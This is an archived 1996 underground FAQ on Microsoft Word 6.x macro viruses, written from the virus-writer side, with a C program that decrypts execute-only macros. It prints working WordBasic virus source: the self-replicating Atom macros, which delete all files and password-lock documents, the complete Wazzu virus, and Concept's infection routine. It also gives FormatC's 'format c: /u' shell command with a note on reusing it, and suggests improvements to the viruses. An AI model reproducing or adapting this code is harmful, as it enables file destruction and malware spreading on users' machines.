Please consider a donation to the Higher Intellect project. See https://preterhuman.net/donate.php or the Donate to Higher Intellect page for more info.

MS WORD 6.x MACRO VIRUSES FAQ

From Higher Intellect Wiki
Jump to navigation Jump to search
      --------------------------------------------------------------
			    The UNDERGROUND
		   MS WORD 6.x MACRO VIRUSES FAQ V1.0
		       <Frequently Asked Questions>
		     By      ,
			<****{=============-
			     ' AuRoDrEpH, the Drow
      --------------------------------------------------------------
			   "Help to MICROFUCK WORD."
      --------------------------------------------------------------

      --------------------------------------------------------------

TOPIC 1 : WHAT IS A WORD MACRO VIRUS?
=========================================

A WORD MACRO Virus, is a macro <list of instructions> or template file
<usually with the .DOT extension> which masquerades as legitimate MS WORD
documents <usually with the extension *.DOC>.  An infected *.DOC file,
doesn't look any different to the average PC user, as it can still contain
a normal document.  The difference is that this document is really just a
template or macro file, with instructions to replicate, and possibly cause
damage.  MS WORD will interpret the *.DOT macro/template file regardless of
extension, as a template file.  This allows for it being passed off as a
legitimate document <*.DOC>  This FAQ takes the position that a document is
meant to be DATA, and a MACRO is at least a partially executable CODE.  When
a document has been infected, it has been merged with executable code in a
multi-part file, part data/part executable.  This tends to be hidden from
the user, who expects a document to be data that is READ, and not some
combination of DATA and executable code designed to be executed, often
against the will of the user, to wreck havok.

These viruses commonly tend to infected the global macros, which get
automatically saved at the end of each session.  When the next session of
MS WORD opens, the infected Global Macros are executed, and the WORD
Environment is now infected, and will in turn be likely to infect documents
whenever they are opened, closed, and created during all future sessions.

As a Virus, the WORD MACRO VIRUSES do REPLICATE.  They can spread in most
cases to any MS WINDOWS Environment or OS that runs a compatible copy of MS
WORD 6.x or 7.x, MS WORD 6.x running on OS/2, as well as WORD for MAC 6.0
for MacOS.  This makes it a multi-platform/multi-OS file infector.  It also
makes it one of the first non-research viruses to be successfully spread to
all of these environments and OS's

MS Word Macro Viruses reside in interpreted data that can spread to
different OS's/platforms.  These viruses do not spread via modification of
executable machine code, but by modification of data in files that are
interpreted by the Microsoft Word 6.0 program and any other versions of
Word that support macros and WordBasic.

WordBasic Macro Language is much simpler to learn and master than
ASSEMBLER, or other popular higher Level programming languages, and for
this reason, Vx people <both new and old alike> have taken to it as a
viable alternative to learning and coding ASM .  The thought of ticking
users off on more than one platform has been around for years, and now
thanks to MS WORD, and all it's compatible versions on other popular
platforms, the Vx people have their wish.  Another Bonus of this new outlet
for Vx writers, is that many virus scanners only scan Executable files,
leaving the .DOC files of WORD alone.  It is important to note that many AV
producers have now included scanners/cleaners to their software, allowing
for the detection of existing MS WORD Macro Viruses.


      --------------------------------------------------------------

TOPIC 2: HOW STUDY A INFECTED DOCUMENT
=======================================

You are happy, :-) You find the latest macro virus. And now, you want to study 
it, find the source code and modify it.
OK, I'll explain... it's very easy.

First of all, you make a copy of the NORMAL.DOT file (it's in the 
MSOFFICE\WINWORD\MODELES).
In most case, the macro virus isn't dangerous, except for the trojan virus, 
FORMATC. In fact, when you read the document, it formats C:. So, a good idea is 
to run a TSR anti-virus like VIRSTOP.
Now, you launch the WORD application, and ...(it's the time to execute)... 
then go to the menu TOOLS/OPTION and in the SAVE directory, click to select 
the option (ask for saving NORMAL.DOT).

Then you take a look at the file with a hexeditor.
	A word document is composed of a first part, the data (text), then 
the macro and in the last part, the data (name of the file,...). OK. Find 
the name of the document near the end... and look for a "U". if you see some 
U's, this mean that the macros are encrypted. You will need more time to study 
because when you copy a macro, WORD gives you the option to READONLY: you can 
execute the macro, but you can't see the source...
If you take a look for the name, you can see the macro of all the macros
included in the file. 
The name can give you a idea of what they do,... but be careful !!     

Now, you open the infected document and see what it does. nothing ... It's 
normal !! Go to the menu TOOLS/MACRO. You can see the name of the 
macro(the same you see with the hexeditor)

IF you can use the Modify button, the macro is Execute-only... 
		THEN go to the TOPIC 4.
		Else you read the script and keep what you want...


TOPIC 3: VIRUS EXAMPLES and what you can keep in mind
======================================================

I have studied some macro virus for you and I've commented them...

      --------------------------------------------------------------

4.1: Concept Virus :
====================

Also known by the Aliases of WW6Macro, WinWord.Concept, Word Basic Macro
Virus (WBMV), Word Macro 9508 <MAC> and Prank Macro <MicroSoft named it
Prank, to downplay the seriousness of the situation>.  This was the first
MS Macro Virus to be detected by the Anti-Virus community, and the first
Macro Virus to be considered in the wild, with infections spreading to the
US, UK, France, Germany, Bulgaria, Canada, the Netherlands, Turkey, and
Finland, and other Countries.

A CONCEPT Infection is easy to notice, on the first execution of the virus
infected document (on the first opening of the infected file) the
MessageBox appears with digit "1" inside, and "Ok" button.  Also, simply
checking the TOOLS/MACROS option to check loaded macros, the presence of
concept is apparent by the appearance of these 5 macros :

       AAAZFS *
       AAAZAO *
       AutoOpen
       PayLoad *
       FileSaveAs

The infection routine of this virus : 

	'see if we're already installed 
	For i = 1 To iMacroCount
		If MacroName$(i, 0, 0) = "PayLoad" Then
			bInstalled = - 1
		End If
		If MacroName$(i, 0, 0) = "FileSaveAs" Then
			bTooMuchTrouble = - 1
		End If
	Next i
	If Not bInstalled And Not bTooMuchTrouble Then
		'add FileSaveAs and copies of AutoOpen and FileSaveAs.
		'PayLoad is just for fun.
		iWW6IInstance = Val(GetDocumentVar$("WW6Infector"))
		sMe$ = FileName$()
		sMacro$ = sMe$ + ":Payload"
		MacroCopy sMacro$, "Global:PayLoad"
		sMacro$ = sMe$ + ":AAAZFS"
		MacroCopy sMacro$, "Global:FileSaveAs"
		sMacro$ = sMe$ + ":AAAZFS"
		MacroCopy sMacro$, "Global:AAAZFS"
		sMacro$ = sMe$ + ":AAAZAO"
		MacroCopy sMacro$, "Global:AAAZAO"



At the end of each Macrocopy, you put ,1 and you have Execute-Only macros... 
	just an idea :)

      --------------------------------------------------------------

4.2: Nuclear :
==============

Known widely as Winword.Nuclear, Wordmacro-Nuclear and Wordmacro-Alert.
This virus was the first WordMacro virus to infect <or at least to attempt
to infect> both data/documents <Word Documents .DOT and .DOC> as well as
executables <.COM/.EXE/NEWEXE>

In truth, it is 2 viruses, a macro virus which alters the Operating
Environment of WORD, and an executable file infector <as well as a system
file deleter>.  This makes NUCLEAR the first Macro Virus to also
incorporate, or at least try to incorporate a classic File Infector Virus.
This virus is actually quite ineffective in the destructive sense, detailed
later in this document. The infected documents contains the following nine
Macros...

       AutoExec
       AutoOpen
       FileSaveAs
       FilePrint
       FilePrintDefault
       InsertPayload   *
       Payload         *
       DropSuriv       *
       FileExit

which get copied into the GLOBAL Macro List.

General detection of NUCLEAR is easy, simply view the macros listed under
the Macros command under the Tools Menu.  If Macros "InsertPayload",
"Payload", and "DropSuriv" are listed, then you'll likely have a NUCLEAR
infection. <unless you named legitimate macros with the same names... :) >
NUCLEAR hides itself from detection, by disabling the "PROMPT FOR CHANGES
TO NORMAL.DOT" option.  Changes are made, and the user doesn't notice
anything.


The "InsertPayload" Macro will cause the following text to be added to the
end of printouts when printing documents. Every 12th printout will have the
following text added...

       And finally I would like to say:
       STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC!

which is appended to the file after the command to print is issued but
prior to the actual printing. FAX's sent via a FAX Print Driver will also
be affected, this much I know first hand.  From testing, I came to the
realization that some Vx putz will start messing with my outgoing faxes
behind our backs.

Another included Macro, is "Payload" which tries to delete IO.SYS,
MSDOS.SYS and COMMAND.COM on April 5th. It is inaffective, as WordBasic
can't reset the attributes of a file which has the System attribute set.
It has been noted that a variant that does work is being circulated.

The Second part of the Nuclear Virus is the executable infector.  The
DropSuriv Macro checks system time, and will attempt to drop the file
infector between 17:00/18:00.  However, the routine is flawed, and
shouldn't work on any system.  <fails due to a syntax error - not closed IF
statement, which makes this payload never executed> If DropSuriv DID work
properly, it would search for the standard DOS util DEBUG.EXE, if found,
the macro drops PH33r.SCR & EXEC_PH.BAT.  The Bat File is executed, and
then the hex dump file PH33r.SCR is converted from a DEBUG script into an
executable, and is in turn executed.  Later, the .SCR and the .BAT files
are deleted to cover its tracks.  The File infector then hooks INT 21h and
writes itself at the end of COM/EXE/NewEXE files.  <however, the memory is
released once this DOS task is completed, includes the memory resident
virus Ph33r> Unconfirmed reports state that a NUCLEAR infected Macro with a
fully operational DropSuriv Macro exist.

The following text strings are in the executable infector...

       =Ph33r=
       Qark/VLAD

The virus group VLAD publish it in the issue n4. (I think the entire version of 
this virus So, found them on the Net.)
      --------------------------------------------------------------

4.3:  Colors:
=============

Colors, is the first WINWORD Macro Virus that could be called cute <IMHO>.
This Virus has the noticeable ability to alter the Windows colors settings.
  If iModEvery = (iEvery - 1) Then          
		sColors$(0) = "Background"
		sColors$(1) = "AppWorkspace"
		...
		sColors$(19) = "InactiveTitleText"
		sColors$(20) = "ButtonHilight"
		
	 For i = 0 To 20
	       SetProfileString("colors", sColors$(i), Str$(Int(Rnd() * 256)) + " "
		   + Str$(Int(Rnd() * 256)) + " " + Str$(Int(Rnd() * 256)))
	 Next i
  End If

Mac Word is immune to the payload <the system colors attack> but is still
susceptable to the infection mechanism, which will attack documents.
Detection of infections is easy, as infected documents appear with the
template icon, rather than the usual document icon.

Commonly known as Rainbow or WordMacro.Colors, this virus was freely posted
to usenet newsgroups on October 14th, 1995. The Colors Virus will infect
the global template <usually NORMAL.DOT> upon opening of an infected
document.  An infected document contains the following macros:

       AutoOpen
       AutoClose
       AutoExec
       FileNew
       FileExit
       FileSave
       FileSaveAs
       ToolsMacro, and other macros.

All Macros included in COLORS are Execute-Only, and cannot be viewed or
edited by MicroSoft Word.  If normal "clean" macros with the same names
existed prior to infection, they will be overwritten by COLORS.

The AutoExec Macro of COLORS is an EMPTY Macro, possibly designed to defeat
any ANTI-MACRO-VIRUS schemes developed by the AV community.  It
accomplishes this by overwriting a "CLEANING/SCANNER" AutoExec Macro with
COLORS empty one, effectively making the AV Scanner/Cleaner useless. 

COLORS will also enable AutoMacros in case you were smart and disabled
them!  It will also disable the MS Word's Prompt to save changes to
NORMAL.DOT.  

 [      OutilsOptionsEnregistrement .InviteGlobalDot = 0 ]  Very interesting


COLORS is crafty, as it can spread without the use of AUTO macros...  thus
defeating the DISABLE AUTOMACROS Feature.  It does so via the Macros:

       File/New
       File/Save
       File/SaveAs
       File/Exit
       Tools/Macro

COLORS will infect NORMAL.DOT whenever a user chooses any of the above
functions.  It also has limited stealth ability, earning it the title of
being the first WINWORD STEALTH MACRO VIRUS.  It accomplishes it's stealth
actions, by hiding itself from the active listing, since attempting to view
active macros would run the COLORS infected Tools/Macro, thus hiding it's
own presence while simultaneously infecting your system. 
 
 [   MacroTools .Name = sNames$(i), .Print = 1, .Delete    ] Good !!!

The COLORS virus will keep track of infections via a counter, named
"countersu", which can be found under the [Windows] section of the WIN.INI
file.  Whenever an infected macro is executed, the counter is incremented
by a count of one.  It quickly adds up, when you consider how much you
OPEN, CREATE, SAVE, EXIT, and CLOSE documents.  When the increment counter
reaches 299, and every 300th execution thereafter, COLORS will be
triggered.  COLORS will then make changes to the system colors setup,
including text, background, borders, buttons, etc., using randomly
determined colors.  The new color scheme becomes apparent to the user
during the next session of Windows.

Colors ability to spread without the use of AutoExecute Macros, and its use
of Advanced Stealth techniques signals a new level of MACRO virus
technology.  <Hiding itself from view when you actively look for it defines
STEALTH in my book, since it evades detection> It also adds fuel to the VxD
argument, as an on access scanner could prevent infection by this type of
stealthy virus.

You have the complete disassemblie in the previous issue.. so download it...
      --------------------------------------------------------------

4.4: DMV:
=========

Commonly known as WordMacro.DMV, DMV is an unremarkable TEST Virus,
possibly the first to be created using the WORDBasic Language.  Joel
McNamera wrote it in the fall of 1994, as a real time TEST for some MACRO
Virus Theories.  The Virus was kept under wraps, and a detailed paper was
published.  This TEST virus was only released, as an educational aid, after
the CONCEPT virus was discovered.  DMV isn't a threat to anyone, as it
announce itself upon infecting the system.

Nothing to say, it's an old virus. and now, all the technique used was 
detected by most AVX.
      --------------------------------------------------------------

4.5: HOT:
=========

Also known as WORDMACRO HOT, WinWord.Hot.

Not the most ingenious of the Macro Virus Family, it's biggest kick, is the
ability to wait or sleep for awhile <up to 14 days> and then delete a file.
WordMacro/Hot appears to be the first Word macro virus written in Russia.
It was found in the wild in Russia in January 1996.

Infected documents contain four execute-only macros:

	AutoOpen
	DrawBringInFrOut
	InsertPBreak
	ToolsRepaginat.

MacIntosh Word Users will notice HOT, by examining the icon of the file...
infected documents appear with the template icon, normal documents appear
with the normal document icon.

NOTE: WordMacro/Hot appears to be the first macro virus to use external
functions, allowing Word macros to call any standard Windows API call.
This makes the spreading function Windows 3.x specific, preventing Word for
MAC and Word 7 for Win '95 from spreading the Virus.  An error dialog will
be displayed under Microsoft Word 7.0.

	Unable to load specified library

HOT activates automatically via it's AutoOpen Macro <assuming no attempt to
disable AutoMacros has been made> adding a line LIKE...

	QLHot=34512

to Ms Word for Windows 6's WinWord6.INI file, which acts as a counter
recorder system, setting a date 14 days in the future for payload
activation.

HOT then copies the included macros to the Global Template, NORMAL.DOT
usually, revising their names...

	AutoOpen          ==>   StartOfDoc
	DrawBringInFrOut  ==>   AutoOpen
	InsertPBreak      ==>   InsertPageBreak
	ToolsRepaginat    ==>   FileSave

A listing of the currently loaded macros in this infected environment will
reveal the names in the right list.  Loading another infected document
<actually a template> will add the left list to the macro list plus the
right list.  NOTE:   Macros have been saved with the 'execute-only'
feature, which means  that a user can't view or edit them.

A clean <AutoMacros disabled> WORD environment will produce the left list
when viewing an infected document.

HOT's FileSave macro cause the virus to randomly decide within 1-6 days
from the infection date to activate whenever an effort to open files is
made.  Upon activation, a document will have it's contents deleted, by
opening it, slecting the entire contents, delting them, and closing the
document, saving it in it's now empty state.

Users with c:\DOS\EGA5.CPI should be protected from this macro, as the
author included a check for this file as a protective measure, noted in the
source code as follows:

  '---------------------------------------------------------------
  '- Main danger section: if TodayNo=(QLHotDateNo + RndDateNo) ---
  '- and if File C:DOSega5.cpi not exist (not for OUR friends) ---
  '---------------------------------------------------------------

HOT's InsertPBreak Macro inserts a page-break in current documents, which
is used as a sign of a document already being infection by HOT.

NOTE:  WordMacro/Hot relies on the existence of KERNEL.EXE

I can see this macro, if you have it, please send it to the mag.... thanks

      --------------------------------------------------------------

4.6: MS WORD 2/MS WORD 6.x MACRO TROJAN WEIDEROFFEN:
====================================================

This is a new MACRO Trojan, <that's been around for 2 years> that goes by
the alias WinWord.Weideroffnen.  It is technically a WinWord 2 infected
document, that works eqwually well under MS WORD 6.x.  It intercepts
AutoClose, and attempts to play tricks with boot-up file AUTOEXEC.BAT. 

I haven't seen this macro virus, so I don't know...

      --------------------------------------------------------------


4.7  WORDMACRO ATOM / ATOMIC
=============================

This is a new Macro Virus, found in February 1996, which works along the
same general ideas as the original Concept virus. The WordMacro/Atom virus
is not known to be in the wild.

The differences, when compared to the Concept Virus, follows:

       - All the macros in this virus have been marked EXECUTE ONLY,
	 making them encrypted
       - Replication occures both during file openings, and file saves.
       - Atom comes with 2 destructive payloads

On December 13th, it's first point of activation occures.  It will attempt
to delete all files in the current file directory.

The second activation, password protects documents, restricting the users
access to their own documents.  This happens when the system clock seconds
counter equals 13, and a File/Save As command is issued.  The passowrd
assigned to the documents is ATOM#1.

If the user disables AUTOMACROS, Atom will be unable to execute and spread
to other documents.  Enabling the Prompt To Save NORMAL.DOT will prevent
Atom from attacking and infecting the NORMAL.DOT file.

Here is the source :
	Keep in mind the idea of put a passwd in a file, not a bad idea.... 
Macros: Atom

Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
	Kill "*.*"
End If
KillError:
End Sub



Macros: AutoOpen

Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
	MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
	MacroCopy FN$ + ":FileOpen", "FileOpen", 1
	MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
	MacroCopy FN$ + ":Atom", "Atom", 1
	SaveTemplate            
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub

Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
	For I = 1 To CountMacros(0)
		If (MacroName$(I, 0) = "Atom") Then
			CheckInfected = 1
		End If                  
	Next I             
End If
End Function



Macros: FileOpen

Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub



Macros: FileSaveAs

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
	MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
	MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
	MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
	MacroCopy "Atom", WindowName$() + ":Atom", 1
	Dlg.Format = 1
End If
If (Second(Now()) = 13) Then        ] easy... to block a document
	Dlg.Password = "ATOM#1"     ] a idea why not put a randomize passwd ?
End If  
FileSaveAs dlg
End Sub

      --------------------------------------------------------------

4.9  FORMATC MACRO TROJAN
==========================

Also known as WORDMACRO.FORMATC, and FORMAT.C.Macro.Trojan

The FORMATC Macro Virus, isn't even a virus, as it DOES NOT SPREAD.  This
makes it another MACRO TROJAN.  This Trojan contains only one macro,
AutoOpen, which will be executed automatically when a document is opened.
The Macro AutoOpen, is READ ONLY, making it encrypted, and unreadable and
editable.  It is visiable in the Macro List.

When FORMATC is executed, "triggered", it will  run a dos session, in a
minimized DOS box.  It will run an Unconditional Format of the C drive.
   
Here is the macro (Basic) but deadly...
Sub MAIN
	sCmd$ = "echo y|format c: /u"
	Shell Environnement$("COMSPEC") + "/c " + sCmd$, 0
End Sub

If you want to execute DOS command, you have here a hint on how to do it.

4.10  WORDMACRO WAZZU
=======================
WordMacro/Wazzu consists of a single AutoOpen macro; this makes it language
independent, ie. this macro virus is able to infect localized versions of
Word as well as the english Word.

It's inserted in your text the word "Wazzu" ... why not....
Nothing more to said, classic... 

Sub MAIN
	On Error Goto errCaught
		
	FileSummaryInfo .Update
	Dim dlg As FileSummaryInfo
	GetCurValues dlg

	fileMacro$ = dlg.Directory + "\" + dlg.FileName + ":autoOpen"
	globMacro$ = "Global:autoOpen"
	MacroFile$ = UCase$(Right$(MacroFileName$(MacroName$(0)), 10))

	If MacroFile$ = "NORMAL.DOT" Then
		MacroCopy globMacro$, fileMacro$
		FileSaveAs .Format = 1
	Else
		MacroCopy fileMacro$, globMacro$
	End If

	Payload

Goto bye
errCaught:

bye:
	On Error Goto 0

End Sub

Sub Payload
	For i = 1 To 3
		If Rnd() < 0.2 Then
			RndWord
			SelectCurWord
			selWord$ = Selection$()
			DeleteWord

			RndWord
			Insert selWord$ + " "
		End If
	Next

	If Rnd() < 0.25 Then
		RndWord
		Insert "wazzu "  <-------------------here's the payload
		StartOfDocument
	End If

End Sub

Sub RndWord
	FileSummaryInfo .Update
	Dim dlg As DocumentStatistics
	GetCurValues dlg

	wordNum = Int(Rnd() * Val(dlg.Words))
	StartOfDocument
	WordRight wordNum
End Sub


TOPIC 5: HOW TO DO WITH EXECUTE-ONLY MACROS
============================================

Easy, when you copy a macro with the option 1, Microsoft Word encrypts the 
source of the macro, so when you look at the file, you can't see it....
But, the encryption they use is stupid :))) an XOR value... so the only 
difficult thing, it's to find the XOR key...you must scan the file 
and the Xor value is included...

I explain the method :
	Locate the "real" filename of the document within the document,
	A few bytes after the end of the name, there is a "U", the byte 
		immediately following is the ... XOR value to use.
	Now to find the beginning of the macros are usually at B89h or 
		at 1509h. To locate, there is always the sequence 
		A5h C6h 41h then a byte and then the XOR value....

This is the standard method, you must know that each macro has a specific XOR 
value.. when you look for the filename, you will find as many U's as you 
have macros in the document.

I encountered some difficulties when the document is composed of encrypted macros 
and normal macros... In this case, try to delete some macros and decrypt...

I can give you a little C source to help you. This source uses a brutal method, so you will have 
1 macro readable by file.... try with the COLORS macro (last issue). I know 
that the soft. functions well.
- --><-cut here---------------------------------
/*********
  (c) AURODREPH Productions 04/1996
**********/

#include "io.h"
#include "stdlib.h"
#include "stdio.h"
#include "conio.h"
#include "process.h"
#include "fcntl.h"
#include "string.h"
#include "sys\stat.h"

void main (void)
 {
	char Name[13];
	char Target[13];
	unsigned char *Buffer;
	int Handler, Handler1;
	unsigned int Offset;
	unsigned long Length = 0;
	int point, max, trouve, cledec, debmac, decfin;
	int stop,nbr,positcle,nbrmac,i;

	clrscr();
	printf (" ******************************************************************\n");
	printf (" *                                                                *\n");
	printf (" *               DECRYPT WORD 6.0 MACROS saved                    *\n");
	printf (" *                 with the option Execute-only                   *\n");
	printf (" *                                                                *\n");
	printf (" *                                                                *\n");
	printf (" *       --- ,This file works only with files < 32 Ko. ----       *\n");
	printf (" *     <*****}===============-                                    *\n");
	printf (" *      (z)  ' AURODREPH Productions 04/1996                      *\n");
	printf (" *                                                     ver 0.666B *\n");
	printf (" ******************************************************************\n");
	printf ("\n"); printf("\n");
	printf ("Name of the input file     = ");
	scanf ("%12s",Name);
	printf ("\n");
	printf ("Name of the output file    = ");
	scanf ("%12s",Target);
	printf("\n");
	printf ("Number of crypted macros   = ");
	scanf ("%d",&nbrmac);
	printf("\n");
	if (nbrmac > 50 ) {exit (0);}
	Handler = open (Name, O_BINARY | O_RDONLY , S_IREAD);
	if (Handler == -1)
		{printf ("The input file doesn't exist.\n"); exit(0);}

	Length = (unsigned long) lseek(Handler, 0, SEEK_END);
	lseek (Handler,0,SEEK_SET);
	Buffer = (unsigned char *) malloc((unsigned) Length);
	if (Buffer == NULL) printf ("Fail memory allocation.\n");
	if (read(Handler, Buffer, (unsigned) Length) != Length)
		{printf ("The size of the file is > 32 ko)\n");
		 printf ("Try to remove some macros with WORD....\n");
		 exit (0);}

	point = 0;
	max = strlen(Name);
	trouve = 1;
	cledec = 0x00;
	debmac = 0x00;
	stop = 0;
	for (i=0; i<max;i++)
		{if ((Name[i]>= 0x61) & (Name[i]<= 0x7A))
			 { Name[i] = Name[i] & 0xDF ;}
		};

	for (Offset = 0x0000; Offset < Length; Offset++)
	 {
	  if ((Buffer[Offset] == Name[point]) && (stop !=1))
			{
			for (point = 1; point <= (max-1); point++)
				 {if (Buffer [Offset+point] == Name[point])
							{ trouve = trouve+1; }                                                  }
							else trouve = 1;
				 };
			}
	  if (trouve == max) {stop = 1;}
	  if ((trouve == max) && (Buffer[Offset] == 0x55))
			{cledec = Buffer[Offset+1];
			trouve = 0;
			Buffer [Offset+1] = 0x00;
			positcle = Offset;
			}
	  point = 0;
	 };
if (cledec == 0x00)
	{printf (" Don't find the decrypted key... \n"); exit (0);}
	else printf ("Decrypted Key for the macro n 1 = %x \n", cledec);

	for (Offset = 0x0000; Offset < Length; Offset++)
	 {
	  if (Buffer[Offset] == 0xA5)
	  {if ((Buffer [Offset+1] == 0xC6) || (Buffer [Offset+1] == 0xC4))
		  {if (Buffer [Offset+2] == 0x41)
			  {if (Buffer [Offset+4] == cledec)
					{debmac = Offset+3;
					}
			  }       }       }      };
if (debmac == 0x00)
		{for (Offset = 0x0000; Offset < Length; Offset++)
				 {
				 if (Buffer[Offset] == cledec-1)
					{if (Buffer [Offset+1] == cledec)
					       {debmac = Offset;  }
						}        };             }
if (debmac == 0x00) { printf (" Don't find the beginning of the macro\n");      exit(0);}


for (nbr = 1 ; nbr <= nbrmac ;nbr++)
{
if (nbr != 1)
	{
	printf ("\n");
	printf (" I decrypt the macro n %d \n", nbr);
	Offset = positcle+24;
	 if (Buffer[Offset] ==  0x55)
			{cledec = Buffer [Offset+1];
			Buffer [Offset+1] = 0x00;
			positcle = Offset;
	   printf ("Decrypted Key for the macro n %d = %x \n", nbr,cledec);
				}
			else
		    {printf (" Don't find the decrypted key ....\n");}
	}
Offset = debmac;
point = 0;
decfin = 1;
stop = 1;
printf ( " I work ");
	do
	{ if (stop == 400) {printf ("."); stop = 1 ;}
	  Buffer[Offset+point] ^= cledec ; /* decryptage par XOR */

	  if (Buffer [Offset+point] == 0x64)
				{Buffer [Offset+point+1] ^= cledec;
				if (Buffer [Offset+point+1] == 0x1a)
					{Buffer [Offset+point+2] ^= cledec;
						if (Buffer [Offset+point+2] == 0x1b)
							{Buffer [Offset+point+3] ^= cledec;
							if (Buffer [Offset+point+3] != 0x64)
								 {decfin = 0;
								 debmac = Offset+point+3;
								 Buffer [Offset+point+3] ^= cledec;
								 }
							else
								 Buffer [Offset+point+3] ^= cledec;
							}
						else
							Buffer [Offset+point+2] ^= cledec;
				}
				else
					 Buffer [Offset+point+1] ^= cledec;
		}
	if ((Offset+point) == Length) {decfin = 0;}

	stop = stop + 1;
	point = point + 1;
	}
	while ( ( decfin != 0) );
printf ("\n");
printf (" End of decrypting the macro n %d \n", nbr);
};

	_fmode= O_BINARY;

	Handler1 = creat(Target, S_IFMT | S_IREAD | S_IWRITE);
	write (Handler1, Buffer,(unsigned) Length);

	close (Handler1);
	close (Handler);
	printf ("\n"); printf ("\n");
	printf (" END ... \n");
	printf ("\n");
	printf (" The decrypted file is  %s .\n", Target);
}

- ------------------><--- cut here ------------------------------------


      --------------------------------------------------------------

      This FAQ is Copyright (z) 1996
    ______            _____            _____                    _____      
   /  __  \  __  __  /  __ \  _____   /  __ \    _____ ______  /  __ \  ___ _
  /  /_/  / / / / / /  / / / /  __ \ /  / /  \  / __ //  ___/ /  / / / /  // \
 /  / /  / / /_/ / /  /_/ / /  /_/ //  /_/   / / /_///  _/_  /  /_/ / /  _~  /
/__/ /__/,/_____/ /__/ \  > \_____//________/ /_//_//_____/ /  ____/ /__//__/
====*****{=========-====\/======[ The DROW of UNDERDARK ]===\_/===============
	 '


MicroFuck (tm), Windows, Word, EXCEL are Copyright (z) 1995-96 MicroFuck Corp.
	      All rights reserved to the virus makers...
       --------------------------------------------------------------

P.S : sorry but i don't use a ENGLISH version of Word, so some names of the 
	instruction could be incorrect !!! Just use the F1 option and find the 
	nearest name....

- ---------------------------------------------------------------------------